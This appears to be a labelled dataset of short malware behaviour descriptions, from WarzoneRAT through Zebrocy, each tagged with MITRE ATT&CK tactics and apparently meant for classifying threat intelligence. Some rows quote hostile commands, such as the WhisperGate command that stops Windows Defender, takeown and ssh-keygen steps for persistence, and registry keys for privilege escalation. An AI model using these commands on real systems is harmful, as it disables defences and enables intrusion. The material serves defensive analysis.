"WarzoneRAT has the capability to install a live and offline keylogger, including through the use of the `GetAsyncKeyState` Windows API.","['TA0009:Collection', 'TA0006:Credential Access']"
WarzoneRAT has relied on a victim to open a malicious attachment within an email for execution.,['TA0002:Execution']
WarzoneRAT can create `HKCU\Software\Classes\Folder\shell\open\command` as a new registry key during privilege escalation.,['TA0005:Defense Evasion']
WarzoneRAT can use a variety of API calls on a compromised host.,['TA0002:Execution']
WarzoneRAT can communicate with its C2 server via TCP over port 5200.,['TA0011:Command and Control']
WarzoneRAT can use PowerShell to download files and execute commands.,['TA0002:Execution']
WarzoneRAT can obtain a list of processes on a compromised host.,['TA0007:Discovery']
WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
WarzoneRAT has the capability to act as a reverse proxy.,['TA0011:Command and Control']
WarzoneRAT can add itself to the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UIF2IS20VK` Registry keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
WarzoneRAT has the ability to control an infected PC using RDP.,['TA0008:Lateral Movement']
"WarzoneRAT can include a rootkit to hide processes, files, and startup.",['TA0005:Defense Evasion']
WarzoneRAT has been distributed as a malicious attachment within an email.,['TA0001:Initial Access']
WarzoneRAT can encrypt its C2 with RC4 with the password `warzone160\x00`.,['TA0011:Command and Control']
"WarzoneRAT can collect compromised host information, including OS version, PC name, RAM size, and CPU details.",['TA0007:Discovery']
WarzoneRAT has been install via template injection through a malicious DLL embedded within a template RTF in a Word document.,['TA0005:Defense Evasion']
WarzoneRAT has the ability of performing remote desktop access via a VNC console.,['TA0008:Lateral Movement']
WarzoneRAT can access the webcam on a victim's machine.,['TA0009:Collection']
WarzoneRAT can use `cmd.exe` to execute malicious code.,['TA0002:Execution']
WastedLocker contains junk code to increase its entropy and hide the actual code.,['TA0005:Defense Evasion']
WastedLocker can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
WastedLocker has performed DLL hijacking before execution.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
WastedLocker can encrypt data and leave a ransom note.,['TA0040:Impact']
"WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload.",['TA0005:Defense Evasion']
The WastedLocker payload includes encrypted strings stored within the .bss section of the binary file.,['TA0005:Defense Evasion']
WastedLocker can enumerate files and directories just prior to encryption.,['TA0007:Discovery']
WastedLocker has copied a random file from the Windows System32 folder to the %APPDATA% location under a different hidden filename.,['TA0005:Defense Evasion']
WastedLocker can delete shadow volumes.,['TA0040:Impact']
WastedLocker can modify registry values within the Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap registry key.,['TA0005:Defense Evasion']
WastedLocker has the ability to save and execute files as an alternate data stream .,['TA0005:Defense Evasion']
"WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc API function to help execute the payload.",['TA0002:Execution']
WastedLocker can identify network adjacent and accessible drives.,['TA0007:Discovery']
WastedLocker can enumerate removable drives prior to the encryption process.,['TA0007:Discovery']
WastedLocker checks for specific registry keys related to the UCOMIEnumConnections and IActiveScriptParseProcedure32 interfaces.,['TA0007:Discovery']
WastedLocker can execute itself as a service.,['TA0002:Execution']
WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
WastedLocker has used cmd to execute commands on the system.,['TA0002:Execution']
WastedLocker has a command to take ownership of a file and reset the ACL permissions using the takeown.exe /F filepath command.,['TA0005:Defense Evasion']
WastedLocker created and established a service that runs until the encryption process is complete.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Waterbear has used DLL side loading to import and load a malicious DLL loader.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Waterbear has the ability to decrypt its RC4 encrypted payload for execution.,['TA0005:Defense Evasion']
Waterbear has used RC4 encrypted shellcode and encrypted functions.,['TA0005:Defense Evasion']
Waterbear can hook the ZwOpenProcess and GetExtendedTcpTable APIs called by the process of a security product to hide PIDs and TCP records from detection.,['TA0005:Defense Evasion']
Waterbear can scramble functions not to be executed again with random values.,['TA0005:Defense Evasion']
Waterbear can receive and load executables from remote C2 servers.,['TA0011:Command and Control']
Waterbear has deleted certain values from the Registry to load a malicious DLL.,['TA0005:Defense Evasion']
Waterbear can leverage API functions for execution.,['TA0002:Execution']
Waterbear can identify the process for a specific security product.,['TA0007:Discovery']
Waterbear can inject decrypted shellcode into the LanmanServer service.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Waterbear can query the Registry key ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI"" to see if the value `OracleOcilib` exists.",['TA0007:Discovery']
Waterbear can find the presence of a specific security software.,['TA0007:Discovery']
Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.,['TA0007:Discovery']
Waterbear can use thread injection to inject shellcode into the process of security software.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
WellMail can archive files on the compromised host.,['TA0009:Collection']
WellMail can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.,['TA0011:Command and Control']
WellMail can exfiltrate files from the victim machine.,['TA0009:Collection']
WellMail can decompress scripts received from C2.,['TA0005:Defense Evasion']
WellMail can receive data and executable scripts from C2.,['TA0011:Command and Control']
WellMail can use TCP for C2 communications.,['TA0011:Command and Control']
"WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.",['TA0011:Command and Control']
WellMail can identify the IP address of the victim system.,['TA0007:Discovery']
WellMail can identify the current username on the victim system.,['TA0007:Discovery']
WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates.,['TA0011:Command and Control']
WellMess has the ability to use DNS tunneling for C2 communications.,['TA0011:Command and Control']
WellMess can send files from the victim machine to C2.,['TA0009:Collection']
WellMess can decode and decrypt data received from C2.,['TA0005:Defense Evasion']
WellMess can identify domain group membership for the current user.,['TA0007:Discovery']
WellMess can write files to a compromised host.,['TA0011:Command and Control']
WellMess can use junk data in the Base64 string for additional obfuscation.,['TA0011:Command and Control']
WellMess can execute PowerShell scripts received from C2.,['TA0002:Execution']
WellMess has used Base64 encoding to uniquely identify communication to and from the C2.,['TA0011:Command and Control']
WellMess can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.,['TA0011:Command and Control']
WellMess can identify the computer name of a compromised host.,['TA0007:Discovery']
WellMess can identify the IP address and user domain on the target machine.,['TA0007:Discovery']
WellMess can collect the username on the victim machine to send to C2.,['TA0007:Discovery']
WellMess can use HTTP and HTTPS in C2 communications.,['TA0011:Command and Control']
WellMess can execute command line scripts received from C2.,['TA0002:Execution']
Wevtutil can be used to clear system and security event logs from the system.,['TA0005:Defense Evasion']
Wevtutil can be used to export events from a specific log.,['TA0009:Collection']
Wevtutil can be used to disable specific event logs on the system.,['TA0005:Defense Evasion']
WhisperGate overwrites the MBR with a bootloader component that performs destructive wiping operations on hard drives and displays a fake ransom note when the host boots.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
"The WhisperGate third stage can use the AdvancedRun.exe tool to execute commands in the context of the Windows TrustedInstaller group via `%TEMP%\AdvancedRun.exe"" /EXEFilename ""C:\Windows\System32\sc.exe"" /WindowState 0 /CommandLine ""stop WinDefend"" /StartDirectory """" /RunAs 8 /Run`.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
WhisperGate can corrupt files by overwriting the first 1 MB with `0xcc` and appending random extensions.,['TA0040:Impact']
WhisperGate can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations.,['TA0005:Defense Evasion']
WhisperGate can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\ drive.,['TA0005:Defense Evasion']
WhisperGate can overwrite sectors of a victim host's hard drive at periodic offsets.,['TA0040:Impact']
WhisperGate can overwrite the Master Book Record on victim systems with a malicious 16-bit bootloader.,['TA0040:Impact']
"WhisperGate can Base64 encode strings, store downloaded files in reverse byte order, and use the Eazfuscator tool to obfuscate its third stage.",['TA0005:Defense Evasion']
WhisperGate can delete tools from a compromised host after execution.,['TA0005:Defense Evasion']
WhisperGate can locate files based on hardcoded file extensions.,['TA0007:Discovery']
WhisperGate can download additional stages of malware from a Discord CDN channel.,['TA0011:Command and Control']
WhisperGate has used `InstallUtil.exe` as part of its process to disable Windows Defender.,['TA0005:Defense Evasion']
WhisperGate has been disguised as a JPG extension to avoid detection as a malicious PE file.,['TA0005:Defense Evasion']
WhisperGate has used the `ExitWindowsEx` to flush file buffers to disk and stop running processes and other API calls.,['TA0002:Execution']
WhisperGate can enumerate connected remote logical drives.,['TA0007:Discovery']
WhisperGate can use PowerShell to support multiple actions including execution and defense evasion.,['TA0002:Execution']
WhisperGate has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
WhisperGate's downloader can reverse its third stage file bytes and reflectively load the file as a .NET assembly.,['TA0005:Defense Evasion']
WhisperGate can recognize the presence of monitoring tools on a target system.,['TA0007:Discovery']
WhisperGate can download and execute AdvancedRun.exe via `sc.exe`.,['TA0002:Execution']
WhisperGate can stop its execution when it recognizes the presence of certain monitoring tools.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
WhisperGate has the ability to enumerate fixed logical drives on a targeted system.,['TA0007:Discovery']
WhisperGate can shutdown a compromised host through execution of `ExitWindowsEx` with the `EXW_SHUTDOWN` flag.,['TA0040:Impact']
WhisperGate can pause for 20 seconds to bypass antivirus solutions.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
WhisperGate can use a Visual Basic script to exclude the `C:\` drive from Windows Defender.,['TA0002:Execution']
WhisperGate can make an HTTPS connection to download additional files.,['TA0011:Command and Control']
WhisperGate can download additional payloads hosted on a Discord channel.,['TA0011:Command and Control']
WhisperGate can use `cmd.exe` to execute commands.,['TA0002:Execution']
Wiarp creates a backdoor through which remote attackers can download files.,['TA0011:Command and Control']
Wiarp creates a backdoor through which remote attackers can inject files into running processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Wiarp creates a backdoor through which remote attackers can open a command line interface.,['TA0002:Execution']
Wiarp creates a backdoor through which remote attackers can create a service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
WinMM is usually configured with primary and backup domains for C2 communications.,['TA0011:Command and Control']
WinMM sets a WH_CBT Windows hook to search for and capture files on the victim.,['TA0007:Discovery']
WinMM sets a WH_CBT Windows hook to collect information on process creation.,['TA0007:Discovery']
"WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.",['TA0007:Discovery']
WinMM uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system.,['TA0007:Discovery']
WinMM uses HTTP for C2.,['TA0011:Command and Control']
WindTail has the ability to use the macOS built-in zip utility to archive files.,['TA0009:Collection']
WindTail can identify and add files that possess specific file extensions to an array for archiving.,['TA0009:Collection']
WindTail has the ability to decrypt strings using hard-coded AES keys.,['TA0005:Defense Evasion']
"WindTail can be delivered as a compressed, encrypted, and encoded payload.",['TA0005:Defense Evasion']
WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.,['TA0010:Exfiltration']
WindTail has the ability to receive and execute a self-delete command.,['TA0005:Defense Evasion']
WindTail has the ability to enumerate the users home directory and the path to its own application bundle.,['TA0007:Discovery']
WindTail can instruct the OS to execute an application without a dock icon or menu.,['TA0005:Defense Evasion']
WindTail has been incompletely signed with revoked certificates.,['TA0005:Defense Evasion']
WindTail has used icons mimicking MS Office files to mask payloads.,['TA0005:Defense Evasion']
"WindTail can invoke Apple APIs contentsOfDirectoryAtPath, pathExtension, and compare.",['TA0002:Execution']
WindTail has the ability to generate the current date and time.,['TA0007:Discovery']
WindTail can use the open command to execute an application.,['TA0002:Execution']
WindTail has the ability to use HTTP for C2 communications.,['TA0011:Command and Control']
Windows Credential Editor can dump credentials.,['TA0006:Credential Access']
"Winexe installs a service on the remote system, executes the command, then uninstalls the service.",['TA0002:Execution']
"Wingbird side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Wingbird exploits CVE-2016-4117 to allow an executable to gain escalated privileges.,['TA0004:Privilege Escalation']
Wingbird deletes its payload along with the payload's parent process after it finishes copying files.,['TA0005:Defense Evasion']
"Wingbird drops a malicious file alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Wingbird performs multiple process injections to hijack system processes and execute malicious code.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Wingbird checks for the presence of Bitdefender security software.,['TA0007:Discovery']
"Wingbird uses services.exe to register a new autostart service named ""Audit Service"" using a copy of the local lsass.exe file.",['TA0002:Execution']
Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.,['TA0007:Discovery']
"Wingbird uses services.exe to register a new autostart service named ""Audit Service"" using a copy of the local lsass.exe file.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution.,['TA0005:Defense Evasion']
Winnti for Linux can encode its configuration file with single-byte XOR encoding.,['TA0005:Defense Evasion']
"Winnti for Linux has the ability to deploy modules directly from command and control servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host.",['TA0011:Command and Control']
"Winnti for Linux has used ICMP, custom TCP, and UDP in outbound communications.",['TA0011:Command and Control']
"Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.",['TA0005:Defense Evasion']
Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control .,['TA0011:Command and Control']
"Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control mechanism.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Winnti for Linux has used HTTP in outbound communications.,['TA0011:Command and Control']
Winnti for Windows can use a variant of the sysprep UAC bypass.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
The Winnti for Windows dropper can decrypt and decompresses a data blob.,['TA0005:Defense Evasion']
Winnti for Windows has the ability to encrypt and compress its payload.,['TA0005:Defense Evasion']
The Winnti for Windows dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.,['TA0005:Defense Evasion']
The Winnti for Windows HTTP/S C2 mode can make use of an external proxy.,['TA0011:Command and Control']
Winnti for Windows can delete the DLLs for its various components from a compromised host.,['TA0005:Defense Evasion']
Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution.,['TA0007:Discovery']
The Winnti for Windows dropper can place malicious payloads on targeted systems.,['TA0011:Command and Control']
The Winnti for Windows HTTP/S C2 mode can make use of a local proxy.,['TA0011:Command and Control']
"A Winnti for Windows implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.",['TA0005:Defense Evasion']
Winnti for Windows can use Native API to create a new process and to start services.,['TA0002:Execution']
Winnti for Windows can communicate using custom TCP.,['TA0011:Command and Control']
Winnti for Windows can check if the explorer.exe process is responsible for calling its install function.,['TA0007:Discovery']
Winnti for Windows can add a service named wind0ws to the Registry to achieve persistence after reboot.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The Winnti for Windows installer loads a DLL using rundll32.,['TA0005:Defense Evasion']
Winnti for Windows can run as a service using svchost.exe.,['TA0002:Execution']
Winnti for Windows can XOR encrypt C2 traffic.,['TA0011:Command and Control']
Winnti for Windows can determine if the OS on a compromised host is newer than Windows XP.,['TA0007:Discovery']
Winnti for Windows can set the timestamps for its worker and service components to match that of cmd.exe.,['TA0005:Defense Evasion']
Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.,['TA0011:Command and Control']
Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the Wiper malware.,"['TA0002:Execution', 'TA0008:Lateral Movement']"
Woody RAT can identify administrator accounts on an infected machine.,['TA0007:Discovery']
Woody RAT can use RSA-4096 to encrypt data sent to its C2 server.,['TA0011:Command and Control']
Woody RAT can collect information from a compromised host.,['TA0009:Collection']
Woody RAT can deobfuscate Base64-encoded strings and scripts.,['TA0005:Defense Evasion']
Woody RAT has used Base64 encoded strings and scripts.,['TA0005:Defense Evasion']
Woody RAT can exfiltrate files from an infected machine to its C2 server.,['TA0010:Exfiltration']
Woody RAT has relied on CVE-2022-30190 for execution during delivery.,['TA0002:Execution']
Woody RAT has the ability to delete itself from disk by creating a suspended notepad process and writing shellcode to delete a file into the suspended process using `NtWriteVirtualMemory`.,['TA0005:Defense Evasion']
"Woody RAT can list all files and their associated attributes, including filename, type, owner, creation time, last access time, last write time, size, and permissions.",['TA0007:Discovery']
Woody RAT has suppressed all error reporting by calling `SetErrorMode` with 0x8007 as a parameter.,['TA0005:Defense Evasion']
"Woody RAT can download files from its C2 server, including the .NET DLLs, `WoodySharpExecutor` and `WoodyPowerSession`.",['TA0011:Command and Control']
Woody RAT can make `Ping` GET HTTP requests to its C2 server at regular intervals for network connectivity checks.,['TA0007:Discovery']
Woody RAT has relied on users opening a malicious email attachment for execution.,['TA0002:Execution']
"Woody RAT can use multiple native APIs, including `WriteProcessMemory`, `CreateProcess`, and `CreateRemoteThread` for process injection.",['TA0002:Execution']
"Woody RAT can execute PowerShell commands and scripts with the use of .NET DLL, `WoodyPowerSession`.",['TA0002:Execution']
"Woody RAT can call `NtQuerySystemProcessInformation` with `SystemProcessInformation` to enumerate all running processes, including associated information such as PID, parent PID, image name, and owner.",['TA0007:Discovery']
Woody RAT can create a suspended notepad process and write shellcode to delete a file into the suspended process using `NtWriteVirtualMemory`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Woody RAT can inject code into a targeted process by writing to the remote memory of an infected system and then create a remote thread.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Woody RAT can search registry keys to identify antivirus programs on an compromised host.,['TA0007:Discovery']
Woody RAT has the ability to take a screenshot of the infected host desktop using Windows GDI+.,['TA0009:Collection']
"Woody RAT can detect Avast Software, Doctor Web, Kaspersky, AVG, ESET, and Sophos antivirus programs.",['TA0007:Discovery']
"Woody RAT can collect .NET, PowerShell, and Python information from an infected host.",['TA0007:Discovery']
Woody RAT has been delivered via malicious Word documents and archive files.,['TA0001:Initial Access']
Woody RAT can use AES-CBC to encrypt data sent to its C2 server.,['TA0011:Command and Control']
"Woody RAT can retrieve the following information from an infected machine: OS, architecture, computer name, OS build version, environment variables, and storage drives.",['TA0007:Discovery']
Woody RAT can retrieve network interface and proxy information.,['TA0007:Discovery']
Woody RAT can retrieve a list of user accounts and usernames from an infected machine.,['TA0007:Discovery']
Woody RAT can communicate with its C2 server using HTTP requests.,['TA0011:Command and Control']
Woody RAT can execute commands using `cmd.exe`.,['TA0002:Execution']
XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords.,['TA0006:Credential Access']
XAgentOSX contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.,['TA0005:Defense Evasion']
XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.,['TA0011:Command and Control']
XAgentOSX contains the readFiles function to return a detailed listing of a specified directory. XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running ls -la ~/Library/Application\ Support/MobileSync/Backup/.,['TA0007:Discovery']
"XAgentOSX contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.","['TA0009:Collection', 'TA0006:Credential Access']"
XAgentOSX contains the execFile function to execute a specified file on the system using the NSTask:launch method.,['TA0002:Execution']
XAgentOSX contains the getProcessList function to run ps aux to get running processes.,['TA0007:Discovery']
"XAgentOSX contains the takeScreenShot functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.",['TA0009:Collection']
XAgentOSX contains the getInstalledAPP function to run ls -la /Applications to gather what applications are installed.,['TA0007:Discovery']
XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user.,['TA0007:Discovery']
"XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.",['TA0007:Discovery']
"XCSSET will compress entire ~/Desktop folders excluding all .git folders, but only if the total data size is under 200MB.",['TA0009:Collection']
"XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.",['TA0003:Persistence']
XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods target_integrator.rb files under the /Library/Ruby/Gems folder or enumerates all .xcodeproj folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder.,['TA0001:Initial Access']
"XCSSET performs AES-CBC encryption on files under ~/Documents, ~/Downloads, and ~/Desktop with a fixed key and renames files to give them a .enc extension. Only files with sizes less than 500MB are encrypted.",['TA0040:Impact']
"XCSSET collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders.",['TA0009:Collection']
XCSSET adds malicious file paths to the DYLD_FRAMEWORK_PATH and DYLD_LIBRARY_PATH environment variables to execute malicious code.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
XCSSET exfiltrates data stolen from a system over its C2 channel.,['TA0010:Exfiltration']
XCSSET has used a zero-day exploit in the ssh launchdaemon to elevate privileges and bypass SIP.,['TA0004:Privilege Escalation']
XCSSET has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions.,['TA0007:Discovery']
XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.,"['TA0009:Collection', 'TA0006:Credential Access']"
XCSSET has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps .,['TA0005:Defense Evasion']
XCSSET uses a hidden folder named .xcassets and .git to embed itself in Xcode.,['TA0005:Defense Evasion']
"XCSSET downloads browser specific AppleScript modules using a constructed URL with the curl command, https://"" & domain & ""/agent/scripts/"" & moduleName & "".applescript.",['TA0011:Command and Control']
"XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
XCSSET loads a system level launchdaemon using the launchctl load -w command from /System/Librarby/LaunchDaemons/ssh.plist.,['TA0002:Execution']
XCSSET uses the chmod +x command to grant executable permissions to the malicious file.,['TA0005:Defense Evasion']
XCSSET builds a malicious application bundle to resemble Safari through using the Safari icon and Info.plist.,['TA0005:Defense Evasion']
"XCSSET uses the plutil command to modify the LSUIElement, DFBundleDisplayName, and CFBundleIdentifier keys in the /Contents/Info.plist file to change how XCSSET is visible on the system.",['TA0005:Defense Evasion']
XCSSET will create an ssh key if necessary with the ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P command. XCSSET will upload a private key file to the server to remotely access the host without a password.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
XCSSET saves a screen capture of the victim's system with a numbered filename and .jpg extension. Screen captures are taken at specified intervals based on the system.,['TA0009:Collection']
XCSSET searches firewall configuration files located in /Library/Preferences/ and uses csrutil status to determine if System Integrity Protection is enabled.,['TA0007:Discovery']
XCSSET uses ps aux with the grep command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities.,['TA0007:Discovery']
XCSSET uses scp to access the ~/Library/Cookies/Cookies.binarycookies file.,['TA0006:Credential Access']
XCSSET uses RC4 encryption over TCP to communicate with its C2 server.,['TA0011:Command and Control']
XCSSET identifies the macOS version and uses ioreg to determine serial number.,['TA0007:Discovery']
XCSSET uses AppleScript to check the host's language and location with the command user locale of .,['TA0007:Discovery']
"Using the machine's local time, XCSSET waits 43200 seconds from the initial creation timestamp of a specific file, .report. After the elapsed time, XCSSET executes additional modules.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"XCSSET uses a shell script to execute Mach-o files and osacompile commands such as, osacompile -x -o xcode.app main.applescript.",['TA0002:Execution']
XTunnel uses SSL/TLS and RC4 to encrypt traffic.,['TA0011:Command and Control']
A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.,['TA0005:Defense Evasion']
XTunnel is capable of accessing locally stored passwords on victims.,['TA0006:Credential Access']
The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.,['TA0011:Command and Control']
XTunnel is capable of probing the network for open ports.,['TA0007:Discovery']
A version of XTunnel introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.,['TA0005:Defense Evasion']
XTunnel relays traffic between a C2 server and a victim.,['TA0011:Command and Control']
XTunnel has been used to execute remote commands.,['TA0002:Execution']
Xbash can create a cronjob for persistence if it determines it is on a Linux system.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Xbash has destroyed Linux-based databases as part of its ransomware capabilities.,['TA0040:Impact']
Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.,['TA0040:Impact']
Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.,['TA0011:Command and Control']
"Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.",['TA0002:Execution']
Xbash can download additional malicious files from its C2 server.,['TA0011:Command and Control']
Xbash can execute malicious JavaScript payloads on the victim’s machine.,['TA0002:Execution']
Xbash can use mshta for executing scripts.,['TA0005:Defense Evasion']
Xbash can perform port scanning of TCP and UDP ports.,['TA0007:Discovery']
Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.,['TA0006:Credential Access']
Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.,['TA0002:Execution']
Xbash can create a Startup item for persistence if it determines it is on a Windows system.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Xbash can use regsvr32 for executing scripts.,['TA0005:Defense Evasion']
Xbash can collect IP addresses and local intranet information from a victim’s machine.,['TA0007:Discovery']
Xbash can execute malicious VBScript payloads on the victim’s machine.,['TA0002:Execution']
Xbash uses HTTP for C2 communications.,['TA0011:Command and Control']
YAHOYAH decrypts downloaded files before execution.,['TA0005:Defense Evasion']
YAHOYAH encrypts its configuration file using a simple algorithm.,['TA0005:Defense Evasion']
YAHOYAH uses HTTP GET requests to download other files that are executed in memory.,['TA0011:Command and Control']
YAHOYAH checks for antimalware solution processes on the system.,['TA0007:Discovery']
YAHOYAH checks for the system’s Windows OS version and hostname.,['TA0007:Discovery']
YAHOYAH uses HTTP for C2.,['TA0011:Command and Control']
ZIPLINE can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool if the `--exclude` parameter is passed by the `tar` process.,['TA0005:Defense Evasion']
ZIPLINE can find and append specific files on Ivanti Connect Secure VPNs based upon received commands.,['TA0007:Discovery']
ZIPLINE can download files to be saved on the compromised system.,['TA0011:Command and Control']
ZIPLINE can communicate with C2 using a custom binary protocol.,['TA0011:Command and Control']
ZIPLINE can identify running processes and their names.,['TA0007:Discovery']
ZIPLINE can create a proxy server on compromised hosts.,['TA0011:Command and Control']
ZIPLINE can use AES-128-CBC to encrypt data for both upload and download.,['TA0011:Command and Control']
"ZIPLINE can identify a specific string in intercepted network traffic, `SSH-2.0-OpenSSH_0.3xx.`, to trigger its command functionality.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
ZIPLINE can use `/bin/sh` to create a reverse shell and execute commands.,['TA0002:Execution']
The ZLib backdoor compresses communications using the standard Zlib compression library.,['TA0009:Collection']
ZLib has sent data and files from a compromised host to its C2 servers.,['TA0010:Exfiltration']
ZLib has the ability to enumerate files and drives.,['TA0007:Discovery']
ZLib has the ability to download files.,['TA0011:Command and Control']
"ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.",['TA0005:Defense Evasion']
ZLib has the ability to obtain screenshots of the compromised system.,['TA0009:Collection']
ZLib has the ability to enumerate system information.,['TA0007:Discovery']
ZLib has the ability to discover and manipulate Windows services.,['TA0007:Discovery']
ZLib communicates over HTTP for C2.,['TA0011:Command and Control']
ZLib has the ability to execute shell commands.,['TA0002:Execution']
ZLib creates Registry keys to allow itself to run as various services.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Zebrocy has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration.,['TA0009:Collection']
Zebrocy uses SSL and AES ECB for encrypting C2 communications.,['TA0011:Command and Control']
"Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.",['TA0009:Collection']
"Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.","['TA0009:Collection', 'TA0006:Credential Access']"
Zebrocy has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.,['TA0006:Credential Access']
